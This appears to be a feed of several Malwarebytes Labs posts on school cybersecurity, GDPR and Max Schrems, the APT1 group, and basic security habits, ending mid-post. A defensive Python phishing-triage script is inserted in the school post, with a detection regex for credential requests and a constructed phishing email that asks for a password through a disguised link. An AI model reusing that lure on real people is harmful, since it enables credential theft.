  • Beware of phishing emails and other social engineering, such as technical support scams or video game scams, aimed at both teachers and students. Look at the sender’s email address and be hyper-aware of attachments or links within the body of the email asking for personal information.
  • Student data should be backed up and encrypted end-to-end in storage and in transmission.
  • Use or create digital curriculum that is COPPA compliant.
  • Use password managers for any teacher, administrator, or even student accounts.
  • Keep all software and hardware updated regularly. Systems and software that have reached end of life (EOL) and are no longer supported with security updates should be purged and replaced.

How to teach it

  • Incorporate cybersecurity hygiene into digital citizenship discussions, as well as digital literacy learning.
  • Make cybersecurity part of curriculum that aligns to state standards for ELA or even math by assimilating knowledge about threats, hackers, or other online dangers into reading comprehension instruction, word problems, or even project-based learning activities.
  • Create gamified lessons, such as phishing tests.
  • Offer rewards for good cybersecurity hygiene, such as stars or points for logging out of accounts before closing browsers.
  • Assign cybersecurity as a research topic for reports.
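The sender-address and link checks from the list above can be applied mechanically before a teacher ever clicks. The script below is an added example, not code from the Malwarebytes post or any Malwarebytes product: it parses a raw email with Python's standard library, flags a display name that name-drops a domain other than the one the mail actually came from, flags links whose visible text names one site while the href goes to another, and notes attachments next to requests for passwords or personal data. The two messages are constructed for the demonstration, all domains use the reserved `.example` TLD, and the "last two labels" domain comparison is a simplifying assumption rather than a real public-suffix lookup.

```python
"""Phishing triage helper (added example; not from the original post).
Mechanises the checks in the post's list: look at who the sender really is,
be suspicious of links and attachments, and watch for requests for personal
information.  Sample messages below are constructed; domains are .example."""
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Phrases that, next to a link or attachment, suggest credential harvesting.
SENSITIVE = re.compile(r"password|verify your account|social security|\bssn\b", re.I)
# Anything that looks like a domain name (used on display names and link text).
DOMAIN_LIKE = re.compile(r"[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}", re.I)


def registrable_domain(host: str) -> str:
    """Last two labels of a host name (assumption: crude, no public-suffix list)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


class _Extractor(HTMLParser):
    """Collects visible text and (href, anchor text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.text, self.links, self._href, self._anchor = [], [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._anchor = dict(attrs).get("href"), []

    def handle_data(self, data):
        self.text.append(data)
        if self._href is not None:
            self._anchor.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._anchor).strip()))
            self._href = None


def triage_email(raw: bytes) -> dict:
    """Return the real sender domain, attachment names and a list of findings."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []

    sender = msg["From"].addresses[0] if msg["From"] else None
    sender_domain = sender.domain.lower() if sender else ""
    # A display name that mentions a domain other than the real sending one.
    for claimed in DOMAIN_LIKE.findall(sender.display_name if sender else ""):
        if registrable_domain(claimed) != registrable_domain(sender_domain):
            findings.append(f"display name mentions {claimed} but mail came from {sender_domain}")

    body = msg.get_body(preferencelist=("html", "plain"))
    content = body.get_content() if body else ""
    links, text = [], content
    if body is not None and body.get_content_type() == "text/html":
        ext = _Extractor()
        ext.feed(content)
        links, text = ext.links, "".join(ext.text)
    # Visible link text naming one site while the href goes somewhere else.
    for href, anchor in links:
        shown = DOMAIN_LIKE.search(anchor)
        real = urlparse(href).hostname or ""
        if shown and real and registrable_domain(shown.group(0)) != registrable_domain(real):
            findings.append(f"link text shows {shown.group(0)} but points to {real}")

    attachments = [p.get_filename() or "<unnamed>" for p in msg.iter_attachments()]
    if SENSITIVE.search(text) and (links or attachments):
        findings.append("asks for credentials/personal data alongside links or attachments")
    if attachments:
        findings.append(f"carries {len(attachments)} attachment(s): {', '.join(attachments)}")

    return {"sender_domain": sender_domain, "attachments": attachments, "findings": findings}


# Constructed sample: a lookalike "helpdesk" mail with a disguised link and a PDF.
SAMPLE_EMAIL = b"""From: "Springfield USD Helpdesk (helpdesk@springfield-usd.example)" <alerts@account-verify.example>
To: teacher@springfield-usd.example
Subject: Action required: verify your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>Your mailbox will be locked. Open <a href="http://login.account-verify.example/x">https://portal.springfield-usd.example</a> and confirm your password.</p>
--b1
Content-Type: application/pdf; name="Form.pdf"
Content-Disposition: attachment; filename="Form.pdf"
Content-Transfer-Encoding: base64

JVBERi0=
--b1--
"""

# Constructed sample: an ordinary plain-text notice from the real domain.
BENIGN_EMAIL = b"""From: Springfield USD Helpdesk <helpdesk@springfield-usd.example>
To: teacher@springfield-usd.example
Subject: Lab closed Friday
Content-Type: text/plain; charset="utf-8"

The computer lab is closed Friday for maintenance.
"""

if __name__ == "__main__":
    for name, raw in (("suspicious", SAMPLE_EMAIL), ("benign", BENIGN_EMAIL)):
        result = triage_email(raw)
        print(name, "from", result["sender_domain"] or "(none)")
        for finding in result["findings"] or ["no findings"]:
            print("  -", finding)
```

The checks are heuristics for a first look, not a verdict: a legitimate newsletter sent through a mailing provider will trip the display-name rule, and a phish that copies the real domain exactly will pass it, so the output is a prompt to look harder rather than a reason to act on the message.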

Engaging students in cybersecurity: a primer for educators
Malwarebytes Labs

Stop, Think, Connect
US Department of Homeland Security

Stay Safe Online/National Cyber Security Awareness Month
National Cyber Security Alliance

Privacy and Internet Safety
Common Sense Media

Framework for Improving Critical Infrastructure Cybersecurity
National Institute of Standards and Technology

The post What K–12 schools need to shore up cybersecurity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (February 18 – 24)

Malwarebytes - Mon, 02/25/2019 - 16:52

Last week on Malwarebytes Labs, we explored the world of crack hunting, gave you a 101 on the world of bots and their threats and advantages, and took a look at some clever phishing scams. We also explained how a Mac fends off malware, posted a handy “lazy person’s guide to cybersecurity,” and dug into some APT action.

Other security news
  • YouTube ran into major problems, specifically, a network of pedophiles. (Source: Wired)
  • Facebook improved location settings: Android users will now find they possess greater control over which information is shared with Facebook. (Source: Facebook)
  • Big extortion, big money: Research reveals “salaries” of up to a quarter of a million dollars in return for getting up to dubious antics online. (Source: The Register)
  • Flaw, blimey: A 19-year-old WinRAR bug was discovered. (Source: CheckPoint)
  • Political infighting leads to data blowout: It’s all very exciting over in the UK, as a major political party reported a former member for alleged breach-related activity. (Source: The Guardian)
  • Collection leaks and compromised passwords: How to steer clear of trouble related to the ongoing “Collection” dumps. (Source: Help Net Security)
  • An egg in this trying time: A malware campaign offers up an eggy attack targeting job seekers. (Source: Proofpoint)
  • ATM hacking: A look at how easy ATM shenanigans have become. (Source: Wired)
  • BabyShark phishing: Yes, it’s a spear phishing campaign called BabyShark. (Source: ZDNet)
  • Wi-Fi and social engineering: A look at some of the most common social engineering tricks deployed against networks. (Source: Security Boulevard)

Stay safe, everyone!

The post A week in security (February 18 – 24) appeared first on Malwarebytes Labs.


Max Schrems: lawyer, regulator, international man of privacy

Malwarebytes - Mon, 02/25/2019 - 16:00

Almost one decade ago, disparate efforts began in the European Union to change the way the world thinks about online privacy.

One effort focused on legislation, pulling together lawmakers from 28 member-states to discuss, draft, and deploy a sweeping set of provisions that, today, has altered how almost every single international company handles users’ personal information. The finalized law of that effort—the General Data Protection Regulation (GDPR)—aims to protect the names, addresses, locations, credit card numbers, IP addresses, and even, depending on context, hair color, of EU citizens, whether they’re customers, employees, or employers of global organizations.

The second effort focused on litigation and public activism, sparking a movement that has raised nearly half a million dollars to fund consumer-focused lawsuits meant to uphold the privacy rights of EU citizens, and has resulted in the successful dismantling of a 15-year-old intercontinental data-transfer agreement for its failure to protect EU citizens’ personal data. The 2015 ruling sent shockwaves through the security world, and forced companies everywhere to scramble to comply with a regulatory system thrown into flux.

The law was passed. The movement is working. And while countless individuals launched investigations, filed lawsuits, participated in years-long negotiations, published recommendations, proposed regulations, and secured parliamentary approval, we can trace these disparate yet related efforts back to one man—Maximilian Schrems.

Remarkably, as the two efforts progressed separately, they began to inform one another. Today, they work in tandem to protect online privacy. And businesses around the world have taken notice.

The impact of GDPR today

A Portuguese hospital, a German online chat platform, and a Canadian political consultancy all face GDPR-related fines issued last year. In January, France’s National Data Protection Commission (CNIL) hit Google with a 50-million-euro penalty—the largest GDPR fine to date—after an investigation found a “lack of transparency, inadequate information and lack of valid consent regarding the ads personalization.”

The investigation began, CNIL said, after it received legal complaints from two groups: the nonprofit La Quadrature du Net and the non-governmental organization None of Your Business. None of Your Business, or noyb for short, counts Schrems as its honorary director. In fact, he helped crowdfund its launch last year.

Outside the European Union, lawmakers are watching these one-two punches as a source of inspiration.

When testifying before Congress about a scandal involving misused personal data, the 2016 US presidential election, and a global disinformation campaign, Facebook CEO Mark Zuckerberg repeatedly heard calls to regulate his company and its data-mining operations.

“The question is no longer whether we need a federal law to protect consumers’ privacy,” said Republican Senator John Thune of South Dakota. “The question is what shape will that law take.”

Democratic Senator Mark Warner of Virginia put it differently: “The era of the Wild West in social media is coming to an end.”

A new sheriff comes to town

In 2011, Schrems was a 23-year-old law student from Vienna, Austria, visiting the US to study abroad. He enrolled in a privacy seminar at the Santa Clara University School of Law where, along with roughly 22 other students, he learned about online privacy law from one of the field’s notable titans.

Professor Dorothy Glancy practiced privacy law before it had anything to do with the Internet, cell phones, or Facebook. Instead, she navigated the world of government surveillance, wiretaps, and domestic spying. She served as privacy counsel to one of the many subcommittees that investigated the Watergate conspiracy.

Later, still working for the subcommittee, she examined the number of federal agency databases that contained people’s personally identifiable information. She then helped draft the Privacy Act of 1974, which restricted how federal agencies collected, used, and shared that information. It is one of the first US federal privacy laws.

The concept of privacy has evolved since those earlier days, Glancy said. It is no longer solely about privacy from the government. It is also about privacy from corporations.

“Over time, it’s clear that what was, in the 70s, a privacy problem in regards to Big Brother and the federal government, has now gotten so that a lot of these issues have to do with the private [non-governmental] collection of information on people,” Glancy said.

In 2011, one of the biggest private, non-governmental collectors of that information was Facebook. So, when Glancy’s class received a guest presentation from Facebook privacy lawyer Ed Palmieri, Schrems paid close attention, and he didn’t like what he heard.

For starters, Facebook simply refused to heed Europe’s data privacy laws.

Speaking to 60 Minutes, Schrems said: “It was obviously the case that ignoring European privacy laws was the much cheaper option. The maximum penalty, for example, in Austria, was 20,000 euros. So, just a lawyer telling you how to comply with the law was more expensive than breaking it.”

Further, according to Glancy, Palmieri’s presentation showed that Facebook had “absolutely no understanding” about the relationship between an individual’s privacy and their personal information. This blind spot concerned Schrems to no end. (Palmieri could not be reached for comment.)

“There was no understanding at all about what privacy is in the sense of the relationship to personal information, or to human rights issues,” Glancy said. “Max couldn’t quite believe it. He didn’t quite believe that Facebook just didn’t understand.”

So Schrems investigated. (Schrems did not respond to multiple interview requests, including one forwarded by his colleagues at Noyb.)

Upon returning to Austria, Schrems decided to figure out just how much information Facebook had on him. The answer was astonishing: Facebook sent Schrems a 1,200-page PDF that detailed his location history, his contact information, information about past events he attended, and his private Facebook messages, including some he thought he had deleted.

Shocked, Schrems started a privacy advocacy group called “Europe v. Facebook” and uploaded redacted versions of his own documents onto the group’s website. The revelations touched a public nerve—roughly 40,000 Europeans soon asked Facebook for their own personal dossiers.

Schrems then went legal. With Facebook’s international headquarters in Ireland, he filed 22 complaints with Ireland’s Data Protection Commissioner, alleging that Facebook was violating EU data privacy law. Among the allegations: Facebook didn’t really “delete” posts that users chose to delete, Facebook’s privacy policy was too vague and unclear to constitute meaningful consent by users, and Facebook engaged in illegal “excessive processing” of user data.

The Irish Data Protection Commissioner rolled Schrems’ complaints into an already-running audit into Facebook, and, in December 2011, released non-binding guidance for the company. Facebook’s lawyers also met with Schrems in Vienna for six hours in February 2012.

And then, according to Schrems’ website, only silence and inaction from both Facebook and the Irish Data Protection Commissioner’s Office followed. There were no meaningful changes from the company. And no stronger enforcement from the government.

Frustrating as it may have been, Schrems kept pressing. Luckily, according to Glancy, he was just the right man for the job.

“He is innately curious,” Glancy said. “Once he sees something that doesn’t quite seem right, he follows it up to the very end.”

Safe Harbor? More like safety not guaranteed

On June 5, 2013, multiple newspapers exposed two massive surveillance programs in use by the US National Security Agency. One program, then called PRISM (now called Downstream), implicated some of the world’s largest technology companies, including Facebook.

Schrems responded by doing what he did best: He filed yet another complaint against Facebook—his 23rd—with the Irish Data Protection Commissioner. Facebook Ireland, Schrems claimed, was moving his data to Facebook Inc. in the US, where, according to The Guardian, the NSA enjoyed “mass access” to user data. Though Facebook and other companies denied their participation, Schrems doubted the accuracy of these statements.

“There is probable cause to believe that ‘Facebook Inc’ is granting the NSA mass access to its servers that goes beyond merely individual requests based on probable cause,” Schrems wrote in his complaint. “The statements by ‘Facebook Inc’ are in light of the US laws not credible, because ‘Facebook Inc’ is bound by so-called ‘gag orders.’”

Schrems argued that, when his data left EU borders, EU law required that it receive an “adequate level of protection.” Mass surveillance, he said, violated that.

The Irish Data Protection Commissioner disagreed. The described EU-to-US data transfer was entirely legal, the Commissioner said, because of Safe Harbor, a data privacy carve-out approved much earlier.

In 1995, the EU adopted the Data Protection Directive, which, up until 2018, regulated the treatment of EU citizens’ personal data. In 2000, the European Commission approved an exception to the law: US companies could agree to a set of seven principles, called the Safe Harbor Privacy Principles, to allow for data transfer from the EU to the US. This self-certifying framework proved wildly popular. For 15 years, nearly every single company that moved data from the EU to the US relied, at least briefly, on Safe Harbor.

Unsatisfied, Schrems asked the Irish High Court to review the Data Protection Commissioner’s inaction. In October 2013, the court agreed. Schrems celebrated, calling out the Commissioner’s earlier decision.

“The [Data Protection Commissioner] simply wanted to get this hot potato off his table instead of doing his job,” Schrems said in a statement at the time. “But when it comes to the fundamental rights of millions of users and the biggest surveillance scandal in years, he will have to take responsibility and do something about it.”

Less than one year later, the Irish High Court came back with its decision—the Court of Justice for the European Union would need to review Safe Harbor.

On March 24, 2015, the Court heard oral arguments for both sides. Schrems’ legal team argued that Safe Harbor did not provide adequate protection for EU citizens’ data. The European Commission, defending the Irish DPC’s previous decision, argued the opposite.

When asked by the Court how EU citizens might best protect themselves from the NSA’s mass surveillance, the lawyer arguing in favor of Safe Harbor made a startling admission:

“You might consider closing your Facebook account, if you have one,” said Bernhard Schima, advocate for the European Commission, all but admitting that Safe Harbor could not protect EU citizens from overseas spying. When asked more directly if Safe Harbor provided adequate protection of EU citizens’ data, the European Commission’s legal team could not guarantee it.

On September 23, 2015, the Court’s advocate general issued his initial opinion—Safe Harbor, in light of the NSA’s mass surveillance programs, was invalid.

“Such mass, indiscriminate surveillance is inherently disproportionate and constitutes an unwarranted interference with the rights [to respect for privacy and family life and protection of personal data],” the opinion said.

Less than two weeks later, the entire Court of Justice agreed.

Ever a lawyer, Schrems responded to the decision with a 5,500-word blog post (assigned a non-commercial Creative Commons public copyright license) exploring current data privacy law, Safe Harbor alternatives, company privacy policies, a potential Safe Harbor 2.0, and mass surveillance. Written with “limited time,” Schrems thanked readers for pointing out typos.

The General Data Protection Regulation

Before the Court of Justice struck down Safe Harbor, before Edward Snowden shed light on the NSA’s mass surveillance, before Schrems received a 1,200-page PDF documenting his digital life, and before that fateful guest presentation in professor Glancy’s privacy seminar at Santa Clara University School of Law, a separate plan was already under way to change data privacy.

In November 2010, the European Commission, which proposes legislation for the European Union, considered a new policy with a clear goal and equally clear title: “A comprehensive approach on personal data protection in the European Union.”

Many years later, it became GDPR.

During those years, the negotiating committees looked to Schrems’ lawsuits as highly informative, Glancy said, because Schrems had successfully proven the relationship between the European Charter of Fundamental Human Rights and its application to EU data privacy law. Ignoring that expertise would be foolish.

“Max [Schrems] was a part of just about all the committees working on [GDPR]. His litigation was part of what motivated the adoption of it,” Glancy said. “The people writing the GDPR would consult him as to whether it would solve his problems, and parts of the very endless writing process were also about what Max [Schrems] was not happy with.”

Because Schrems did not respond to multiple interview requests, it is impossible to know his precise involvement in GDPR. His Twitter and blog have no visible, corresponding entries about GDPR’s passage.

However, public records show that GDPR’s drafters recommended several areas of improvement in the year before the law passed, including clearer definitions of “personal information,” stronger investigatory powers to the EU’s data regulators, more direct “data portability” to allow citizens to directly move their data from one company to another while also obtaining a copy of that data, and better transparency in how EU citizens’ online profiles are created and targeted for ads.

GDPR eventually became a sweeping set of 99 articles that tightly regulate the collection, storage, use, transfer, and disclosure of data belonging to all EU citizens, giving those citizens more direct control over how their data is treated.

For example, citizens have the “right to erasure,” in which they can ask a company to delete the data collected on them. Citizens also have the “right to access,” in which companies must provide a copy of the data collected on a person, along with information about how the data was collected, who it is shared with, and why it is processed.

Approved by a parliamentary vote in April 2016, GDPR took effect two years later.

GDPR’s immediate and future impact

On May 23, 2018, GDPR’s arrival was sounded not by trumpets, but by emails. Facebook, TicketMaster, eBay, PricewaterhouseCoopers, The Guardian, Marriott, KickStarter, GoDaddy, Spotify, and countless others began their public-facing GDPR compliance strategies by telling users about updated privacy policies. The email deluge inspired rankings, manic tweets, and even a devoted “I love GDPR” playlist. The blitz was so large, in fact, that several threat actors took advantage, sending fake privacy policy updates to phish for users’ information.

Since then, compliance looks less like emails and more like penalties.

Early this year, Google received its €50 million ($57 million) fine out of France. Last year, a Portuguese hospital received a €400,000 fine for two alleged GDPR violations. Because of a July 2018 data breach, a German chat platform got hit with a €20,000 fine. And in the reported first-ever GDPR notice from the UK, Canadian political consultancy—and murky partner to Cambridge Analytica—AggregateIQ received a notice about potential fines of up to €20 million.

To Noyb, the fines are good news. Gaëtan Goldberg, a privacy lawyer with the NGO, said that data privacy law compliance has, for many years, been lacking. Hopefully GDPR, which Goldberg called a “major step” in protecting personal data, can help turn that around, he said.

“[We] hope to see strong enforcement measures being taken by courts and data protection authorities around the EU,” Goldberg said. “The fine of 50 [million] euros the French CNIL imposed on Google is a good start in this direction.”

The future of data privacy

Last year, when Senator Warner told Zuckerberg that “the era of the Wild West in social media is coming to an end,” he may not have realized how quickly that would come true. In July 2018, California passed a statewide data privacy law called the California Consumer Privacy Act. Months later, three US Senators proposed their own federal data privacy laws. And just this month, the Government Accountability Office recommended that Congress pass a data privacy law similar to GDPR.

Data privacy is no longer a concept. It is the law.

In the EU, that law has released a torrent of legal complaints. Hours after GDPR came into effect, Noyb lodged a series of complaints against Google, Facebook, Instagram, and WhatsApp.

Goldberg said the group’s legal complaints are one component of meaningful enforcement on behalf of the government. Remember: Google’s massive penalty began with an investigation that the French authorities said started after it received a complaint from Noyb.

Separately, privacy group Privacy International filed complaints against Europe’s data-brokers and advertising technology companies, and Brave, a privacy-focused web browser, filed complaints against Google and other digital advertising companies.

Google and Facebook did not respond to questions about how they are responding to the legal complaints. Facebook also did not respond to questions about its previous legal battles with Schrems.

Electronic Frontier Foundation International Director Danny O’Brien wrote last year that, while we wait for the results of the above legal complaints, GDPR has already motivated other privacy-forward penalties and regulations around the world:

“In Italy, it was competition regulators that fined Facebook ten million euros for misleading its users over its personal data practices. Brazil passed its own GDPR-style law this year; Chile amended its constitution to include data protection rights; and India’s lawmakers introduced a draft of a wide-ranging new legal privacy framework.”

As the world moves forward, one man—the one who started it all—might be conspicuously absent. Last year, Schrems expressed a desire to step back from data privacy law. If anything, he said, it was time for others to take up the mantle.

“I know I’m going to be deeply engaged, especially at the beginning, but in the long run [Noyb] should absolutely not be Max’s personal NGO,” Schrems told The Register in a January 2018 interview. Asked to clarify about his potential future beyond privacy advocacy, Schrems said: “It’s retirement from the first line of defense, let’s put it that way… I don’t want to keep bringing cases for the rest of my life.”

Surprisingly, for all of Schrems’ public-facing and public-empowering work, his interviews and blog posts sometimes portray him as a deeply humble, almost shy individual, with a down-to-earth sense of humor, too. When asked during a 2016 podcast interview if he felt he would be remembered in the same vein as Edward Snowden, Schrems bristled.

“Not at all, actually,” Schrems said. “What I did is a very conservative approach. You go to the courts, you have your case, you bring it and you do your thing. What Edward Snowden did is a whole different ballgame. He pretty much gave up his whole life and has serious possibilities to some point end up in a US prison. The worst thing that happened to me so far was to be on that security list of US flights.”

During the same interview, Schrems also deflected his search result popularity.

“Everyone knows your name now,” the host said. “If you Google ‘Schrems,’ the first thing that comes up is ‘Max Schrems’ and your case.”

“Yeah but it’s also a very specific name, so it’s not like ‘Smith,’” Schrems said, laughing. “I would have a harder time with that name.”

If anything, the popularity came as a surprise to Schrems. Last year, in speaking to Bloomberg, he described Facebook as a “test case” when filing his original 22 complaints.

“I thought I’d write up a few complaints,” Schrems said. “I never thought it would create such a media storm.”

Glancy described Schrems’ initial investigation into Facebook in much the same way. It started not as a vendetta, she said, but as a courtesy.

“He started out with a really charitable view of [Facebook],” Glancy said. “At some level, he was trying to get Facebook to wake up and smell the coffee.”

That’s the Schrems that Glancy knows best, a multi-faceted individual who makes time for others and holds various interests. A man committed to public service, not public spotlight. A man who still calls and emails her with questions about legal strategy and privacy law. A man who drove down the California coast with some friends during spring break. Maybe even a man who is tired of being seen only as a flag-bearer for online privacy. (He describes himself on his Twitter profile as “(Luckily not only) Law, Privacy and Politics.”)

“At some level, he considers himself a consumer lawyer,” Glancy said. “He’s interested in the ways in which to empower the little guy, who is kind of abused by large entities that—it’s not that they’re targeting them, it’s that they just don’t care. [The people’s] rights are not being taken account of.”

With GDPR in place, those rights, and the people they apply to, now have a little more firepower.

The post Max Schrems: lawyer, regulator, international man of privacy appeared first on Malwarebytes Labs.


The Advanced Persistent Threat Files: APT1

Malwarebytes - Fri, 02/22/2019 - 17:59

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target.

While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re looking at APT1. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT1?

APT1 has been identified by various parties as Unit 61398 of the People’s Liberation Army. They were one of the first APT groups to be publicly named, in a report released by Mandiant (now owned by FireEye) in 2013. APT1 was noted for wide-scale, high-volume collection, targeting roughly 150 mostly English-speaking companies at the time of reporting.

Targeting industries noted as internal development areas by China’s 12th Five-Year Plan, APT1 was notable in contrast to more familiar threat groups for its persistence (average observed persistence on target was 356 days) and its ability to compromise a target using multiple attack vectors.

Malware commonly deployed

APT1 is known for deploying the following malware:

  • Poison Ivy
  • Custom backdoors delivered by spear phish
  • Mimikatz
  • SeaSalt

NOTE: It’s generally inappropriate to attribute an attack based solely on the malware deployed. APT actors do not operate in a vacuum; they’re capable of collaborating with each other, as well as selling malware to other groups upon conclusion of an ops cycle.

Should you be worried?

Probably not. After a catastrophic OPSEC failure like the Mandiant report, it’s highly unlikely that the group still exists in the form originally disclosed. Disclosure of specific threat actors in the unit, as well as the unit’s physical location and infrastructure, eroded their counterintelligence posture such that it would be difficult to continue network operations without significant changes.

In 2015, President Obama and Xi Jinping met to discuss how both countries would address cyber espionage. Since that time, broad-spectrum indiscriminate collection of the type APT1 engaged in has waned in favor of targeted attacks, or upstream targeting of service providers to high-value targets. If you do not belong to a cleared government contracting company, a large-scale telecom, or a law firm providing services to either of the above, you most likely do not face a significant threat from any Chinese APT group.

What might they do next?

Probably not much, due to both political priority changes and counterintelligence failures exposing experienced operators. However, in October 2018, McAfee released a report on code reused from an APT1 backdoor employed to launch attacks against targets in the US, South Korea, and Canada. Differences in TTPs suggest this is not an APT1 operation, but instead a new campaign that is reusing old code from a variety of sources.

Given that APT1 themselves were no longer able to operate with impunity, it seems reasonable that they would disseminate tools to threat actor groups with better counterintelligence postures.

Additional resources

Mandiant report on APT1

Mysterious return of years-old Chinese malware

IOC samples historically associated with APT1

The post The Advanced Persistent Threat Files: APT1 appeared first on Malwarebytes Labs.


The lazy person’s guide to cybersecurity: minimum effort for maximum protection

Malwarebytes - Thu, 02/21/2019 - 17:00

Are you tired of that acquaintance who keeps bugging you with computer questions? Do you avoid visiting certain people because you know you will spend most of the evening cleaning up their machine?

My uncle Bob is one of those people. He’s a nice guy, but with computers, he’s not just an accident waiting to happen—he’s an accident waiting to become a catastrophe. To keep Uncle Bob’s computer safe without blowing up the Internet, we need to give him the simplest of instructions that result in protecting him against as much as possible. Uncle Bob needs a lazy person’s guide to cybersecurity.

It’s not that Uncle Bob is lazy. It’s that he’s overwhelmed by the amount of stuff he has to do to keep his data and devices secure. Multiple passwords, reading through EULAs, website cookies that he clicks “agree” to without really paying attention—they’re giving him a serious case of security fatigue. And as his helper, you’re probably pretty over it, too.

The funny thing is, with adequate cybersecurity, Uncle Bob’s—and by extension all of our—problems would be much less frequent and less severe. So, let’s see if we can work out a system of minimum effort that renders reasonable results.

Before we begin, we should note that lazy cybersecurity should not apply to devices used to store sensitive data, conduct financial transactions, or communicate confidential or proprietary information. Lazy security is a good way to protect those who prefer to do nothing rather than be overwhelmed by 50 somethings, but it shouldn’t have severe consequences if it goes wrong.

User education

Your first step should always be user education. So many of today’s most dangerous threats are delivered through social engineering, i.e., by tricking users into giving up their data or downloading the malware themselves from an infected email attachment. Therefore, knowing what not to click on and download can keep a good portion of threats off a lazy person’s device.

With most people, it helps to know why they shouldn’t download or click on links in emails that look like they came from a legitimate institution. Just telling them “don’t do that” may help for a bit, but advice is better retained if it’s grounded in practical reasoning. Therefore, each item in this list is accompanied by a brief explanation.

  • Do not click on links asking to fill out your personal information. Your financial institutions will not send emails with links to click, especially if those links are asking you to update personally identifiable information (PII). If a website promises you something in return for filling out personal data, they are phishing. In return for your data, you will probably get lots more annoying emails, possibly an infection, and no gift.
  • Don’t fall for too-good-to-be-true schemes. If you get offered a service, product, game, or other tantalizing option for free, and it is unclear how the producers of said service or item are making money, don’t take it. Chances are, you will pay in ways that are not disclosed with the bargain, including sitting through overly-obnoxious ads, paying for in-game or in-product purchases, or being bombarded with marketing emails or otherwise awful user experiences.
  • Don’t believe the pop-ups and phone calls saying your computer is infected. Unsolicited phone calls and websites that do so are tech support scams. The only programs that can tell if you have an infection are security platforms that either come built into your device or antivirus software that you’ve personally purchased or downloaded. Think about it: Microsoft does not monitor billions of computers to call you as soon as they notice a virus on yours.
  • Don’t download programs that call themselves system optimizers. We consider these types of software, including driver updaters and registry cleaners, potentially unwanted programs. Why? They do nothing helpful—instead, they often take over browser home pages, redirect to strange landing pages, add unnecessary toolbars, and even serve up a bunch of pop-up ads. While not technically dangerous themselves, they let a lot of riff raff in the door.
  • Never allow web push notifications. I have yet to find a useful reason for these, beyond advertising.

Beyond staying away from “allow” and “download” buttons, and steering clear of links asking for PII, users who conduct any kind of financial transaction on their machines, be it online shopping or banking, should approach those transactions with extreme caution. Here’s where we ask users to take action, looking for security clues and doing a little research before paying that bill or buying that new book.

  • Use a designated browser you trust. This needn’t be for all surfing, but for purchasing especially, research the different browsers and see which one you feel safest with, whether that’s because they have few vulnerabilities, don’t track your surfing behavior, or encrypt all communication. Major browsers such as Firefox, Safari, and Chrome have strengths and weaknesses they bring to the game, so it’s a matter of personal preference. We do suggest staying away from older browsers rife with security holes, such as Internet Explorer.
  • Look for HTTPS and the green padlock. No, it’s no longer a guarantee that the site is safe just because it has a green padlock, but it does mean the communication is encrypted. If you combine that with being on the true website of a trusted vendor, you can breathe easier knowing your payment details cannot be intercepted in transit.
  • Use a password manager. Simple as that. Passwords are a real problem, as users tend to re-use the same ones across multiple accounts, keep old ones laying around because they’re the only ones they can remember, or write them down somewhere they can be easily found. No need for 27 different passwords. Just one manager, preferably with multi-factor authentication. (Bonus points for healthcare or bank organizations with logins that use physical or behavioral biometrics.)

This could turn out to be too confusing for the Uncle Bobs of this world, however. If so, best to point them in the direction of brick-and-mortar stores for shopping, the checkbook for paying bills, and the actual bank to conduct other financial business.

How to set up a system for a non-tech-savvy person

Perhaps Uncle Bob can only manage so much security education before feeling overburdened with technical knowledge. In that case, it helps for a tech-savvy friend or relative to pitch in and tighten up a few things on the backend.


First of all, if someone is looking for a new computer for non-sensitive purposes, such as browsing, social media, games, and some basic email or chat functions, you can chime in with recommendations. For someone not invested in heavy gaming, a Chromebook would be a good option, as it will save them some money and can perform all those functions, plus any browser-based gaming. However, someone with an interest in PC gaming will likely need an entirely different OS and an intense graphics card (and therefore lots of protection against cryptominers). Meanwhile, Macs are good options for users looking to get into graphic design.


Installing software on a system usually comes with the task of having to keep it up-to-date. Therefore, any software programs that Uncle Bob selects should minimize the potential pitfalls.

When Uncle Bob is shopping for software, recommend he finds programs that have a self-updating function. We know this isn’t always recommended in a work environment, but for the lazy security person, it’s perfect. One less thing to worry about.

In addition, selecting software that allows users to minimize notifications to only dire warnings will keep Uncle Bob from getting confused. Notifications coming from programs can have strange effects on the less computer savvy for several reasons:

  • They don’t understand to which program they belong, which takes away the context for them.
  • The text in the notifications is designed to be short, not always maximized for clarity.
  • Technical terms used in the notification are unknown to the receiver.

Their reactions may vary. Some will simply click until they disappear. This is the behavior that usually gets them into trouble, so you don’t want to give them another reason to click–click–click away. Others may get worried and call for backup immediately, asking what’s wrong and why they are getting this “pop-up.” So, any software that can be set to only issue a warning when something is really amiss deserves another plus.

Browser add-ons

There are some secure browsers out there that value your privacy, but I’m pretty sure my Uncle Bob does not like using them. There is a learning curve involved that may not seem steep to you and me, but my uncle Bob…you know what I mean. But there is hope on the horizon. Some of the more user-friendly browsers can be equipped with extensions/add-ons/plugins that boost security by adding an extra protective layer.

There are browser extensions that can make your browser more secure in a number of ways.

Read: How to tighten security and increase privacy on your browser

It’s a fine line

